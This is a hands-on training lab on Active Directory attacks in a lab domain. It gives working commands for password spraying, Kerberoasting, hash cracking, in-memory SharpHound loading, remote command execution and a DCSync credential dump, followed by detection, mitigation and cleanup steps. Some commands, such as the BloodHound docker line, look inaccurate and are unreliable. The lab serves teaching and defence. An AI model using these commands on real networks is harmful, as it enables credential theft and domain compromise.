Lab 6: Active Directory Attack Paths¶
Lab Overview¶
Estimated Duration: 3-4 hours Difficulty: Advanced Environment: VirtualBox/VMware with Windows Server 2022 DC + Windows 10 client Learning Objectives: Execute Kerberoasting, enumerate AD attack paths with BloodHound, and implement mitigations
Prerequisites¶
- Completed Chapter 17 (Red Team Operations)
- VirtualBox or VMware installed
- Minimum: 8 GB RAM, 40 GB disk space free
Lab Environment Setup¶
Option A: Download Pre-Built Lab (Recommended)¶
# GOAD (Game Of Active Directory) — pre-built vulnerable AD lab
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD
pip3 install -r requirements.txt
# Start with VirtualBox (default)
vagrant up # Builds 5 VMs: 2 DCs, 3 domain-joined servers
# Network: 192.168.56.0/24
# Domains: NORTH.SEVENKINGDOMS.LOCAL, SEVENKINGDOMS.LOCAL
Option B: Manual Setup¶
# Windows Server 2022 DC setup
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName "lab.local" -InstallDns -Force
# Create vulnerable accounts (lab only!)
New-ADUser -Name "svc_backup" -SamAccountName "svc_backup" `
-AccountPassword (ConvertTo-SecureString "Backup2022!" -AsPlainText -Force) `
-Enabled $true
# Set SPN for Kerberoasting vulnerability
Set-ADUser svc_backup -ServicePrincipalNames @{Add="backup/backupserver.lab.local"}
New-ADUser -Name "svc_sql" -SamAccountName "svc_sql" `
-AccountPassword (ConvertTo-SecureString "Summer2023!" -AsPlainText -Force) `
-Enabled $true
Set-ADUser svc_sql -ServicePrincipalNames @{Add="MSSQLSvc/sqlserver.lab.local:1433"}
# Add deliberate misconfiguration: give svc_backup DCSync rights (DO NOT DO THIS IN PRODUCTION)
Add-ADObjectAcl -TargetIdentity "DC=lab,DC=local" -PrincipalIdentity svc_backup `
-Rights ExtendedRight -AccessControlType Allow
Part 1: Initial Reconnaissance¶
1.1 Network Enumeration¶
From your Kali Linux attack VM (192.168.56.100):
# Discover domain controllers
nmap -sV -p 88,389,445,3268 192.168.56.0/24 --open
# Enumerate LDAP anonymously (if allowed)
ldapsearch -x -H ldap://192.168.56.10 -b "DC=lab,DC=local" "(objectclass=user)" \
sAMAccountName userPrincipalName description | head -100
# Check for MS-RPC null session
rpcclient -U "" -N 192.168.56.10 -c "enumdomusers"
1.2 Password Spray (Without Lockout)¶
# Kerbrute — identify valid users via Kerberos (no lockout risk)
./kerbrute userenum --dc 192.168.56.10 -d lab.local /usr/share/wordlists/xato-net-10-million-usernames.txt
# Password spray after identifying users (low-lockout-risk rate: 1 per 30 min)
./kerbrute passwordspray --dc 192.168.56.10 -d lab.local users.txt "Winter2024!"
Part 2: Kerberoasting¶
2.1 Request Service Tickets¶
# Option A: Impacket GetUserSPNs (from Linux, with valid credentials)
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py \
lab.local/john:Password123 -dc-ip 192.168.56.10 \
-outputfile kerberoast_hashes.txt
# Option B: Rubeus (from Windows victim machine)
# Upload via your initial access point
.\Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
# View the captured hash
cat kerberoast_hashes.txt
# $krb5tgs$23$*svc_backup$LAB.LOCAL$backup/backupserver.lab.local*$...
2.2 Offline Hash Cracking¶
# Hashcat — crack Kerberoast hash (-m 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# If GPU available (significantly faster):
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
--rules-file /usr/share/hashcat/rules/best64.rule \
-d 1 # Device 1 = first GPU
Expected Result: svc_backup:Backup2022! cracked within minutes.
Part 3: BloodHound Attack Path Analysis¶
3.1 Deploy BloodHound CE¶
# Docker-based BloodHound Community Edition
docker run -d \
-e "neo4j/neo4j" \
-e "bloodhound" \
-p 7474:7474 \
-p 7687:7687 \
-p 8080:8080 \
specterops/bloodhound-community-edition
# Access at: http://localhost:8080
# Default credentials: admin/bloodhoundcommunityedition
3.2 Run SharpHound Data Collection¶
# From Windows victim (PowerShell — assuming you have domain creds now)
# Method 1: .NET assembly loaded in memory (leaves less disk trace)
$bytes = [System.IO.File]::ReadAllBytes("C:\Tools\SharpHound.exe")
[System.Reflection.Assembly]::Load($bytes)
[Sharphound.Program]::Main(@("-c", "All", "--OutputDirectory", "C:\Windows\Temp\"))
# Method 2: Direct execution (simpler for lab)
.\SharpHound.exe -c All --OutputDirectory C:\Windows\Temp\ --ZipFileName lab_data.zip
# Transfer zip to Linux for upload to BloodHound
3.3 Analyze Attack Paths¶
In BloodHound web interface:
-- Query 1: Find all Domain Admin attack paths
MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@LAB.LOCAL"}))
WHERE u.enabled=true
RETURN p
LIMIT 10
-- Query 2: Find all Kerberoastable accounts with high-value access
MATCH (u:User {hasspn:true})-[:MemberOf|AdminTo*1..]->(t:Computer {highvalue:true})
RETURN u.name, t.name
-- Query 3: Find DCSync rights (non-DCs)
MATCH p=(u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain)
RETURN u.name, type(relationships(p)[0]) as permission
Lab Exercise: Use BloodHound to find the shortest path from your compromised john user to Domain Admins. Document the full attack chain.
Part 4: Exploiting the Attack Path¶
4.1 Pass-the-Hash with CrackMapExec¶
# After cracking svc_backup password:
cme smb 192.168.56.0/24 -u svc_backup -p 'Backup2022!' --shares
# Identify which machines svc_backup can admin
cme smb 192.168.56.0/24 -u svc_backup -p 'Backup2022!' --local-auth
# Execute command if admin access
cme smb 192.168.56.10 -u svc_backup -p 'Backup2022!' -x "whoami"
4.2 DCSync (If svc_backup Has Replication Rights)¶
# Impacket secretsdump — DCSync from Linux
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
lab.local/svc_backup:Backup2022!@192.168.56.10 -just-dc-ntlm
# Expected output:
# lab.local\Administrator:500:aad3b435...:32196B56...:::
# lab.local\krbtgt:502:aad3b435...:e6d31a1d...:::
Part 5: Detection Analysis¶
5.1 Review Windows Event Logs¶
# On Domain Controller — find Kerberoasting events
Get-WinEvent -LogName Security -FilterXPath `
"*[System[EventID=4769] and EventData[Data[@Name='TicketEncryptionType']='0x17']]" `
-MaxEvents 50 | Select-Object TimeCreated, Message
# EventID 4769 with EncryptionType 0x17 (RC4) = Kerberoasting indicator
# Note: AES Kerberoasting (0x12/0x11) does NOT trigger this — modern recommendation:
# Enforce AES-only tickets: Set-ADUser svc_backup -KerberosEncryptionType AES256
5.2 Generate Detection Report¶
Document for each attack technique you performed: - What log/alert fired? (or what should have fired) - What Sigma rule would detect this? - What control would prevent this?
Attack → Detection Mapping:
| Attack | Log Evidence | Sigma Rule Reference |
|---|---|---|
| Kerberoasting | Event 4769, EncType=0x17 | Sigma: win_security_kerberoasting.yml |
| BloodHound collection | LDAP queries with unusual filters | Sigma: win_ad_sharphound_recon |
| DCSync | Event 4662, DS-Replication rights | Sigma: win_security_dcsync.yml |
| Pass-the-Hash | Event 4624, LogonType=3, NTLMv2 from unusual host | Sigma: win_pass_the_hash.yml |
Part 6: Mitigation Implementation¶
6.1 Deploy Group Managed Service Accounts (gMSA)¶
# Replace vulnerable SPN accounts with gMSA (240-char auto-rotating password)
# Kerberoasting attack is neutralized — password impossible to crack
# Create gMSA
Add-KdsRootKey -EffectiveImmediately # Required on new domain; wait 10 hours in production
New-ADServiceAccount -Name "gMSA_Backup" `
-PrincipalsAllowedToRetrieveManagedPassword "Domain Controllers", "BackupServer$" `
-DNSHostName "backupserver.lab.local"
# Install on target server
Install-ADServiceAccount gMSA_Backup
# Test
Test-ADServiceAccount gMSA_Backup # Should return True
6.2 Enable Protected Users Group¶
# Protected Users: prevents NTLM auth, DES/RC4 encryption, unconstrained delegation
Add-ADGroupMember -Identity "Protected Users" -Members "svc_backup", "Administrator"
# Test: after adding to Protected Users, verify NTLM is rejected
# cme smb 192.168.56.10 -u Administrator -H <NTLM_HASH> --local-auth
# Should fail: "STATUS_ACCOUNT_RESTRICTION"
6.3 Audit DCSync Permissions¶
# Find all accounts with DS-Replication rights (except DCs)
$rootDSE = [System.DirectoryServices.DirectoryEntry]"LDAP://RootDSE"
$domainDN = $rootDSE.defaultNamingContext
$ACL = Get-Acl "AD:\$domainDN"
$ACL.Access | Where-Object {
$_.ActiveDirectoryRights -match "ExtendedRight" -and
$_.ObjectType -match "1131f6aa|1131f6ab|89e95b76" # Replication GUIDs
} | Select-Object IdentityReference, ActiveDirectoryRights
Lab Questions¶
- How many Kerberoastable service accounts did you find in the lab environment?
- What was the shortest BloodHound attack path from a regular user to Domain Admin?
- Which Event ID and specific field values indicate Kerberoasting activity?
- What is the difference in detection between RC4 and AES Kerberoasting?
- How does gMSA specifically prevent the Kerberoasting attack?
Cleanup¶
# GOAD cleanup
vagrant destroy -f
# Remove created accounts (Option B setup)
Remove-ADUser svc_backup
Remove-ADUser svc_sql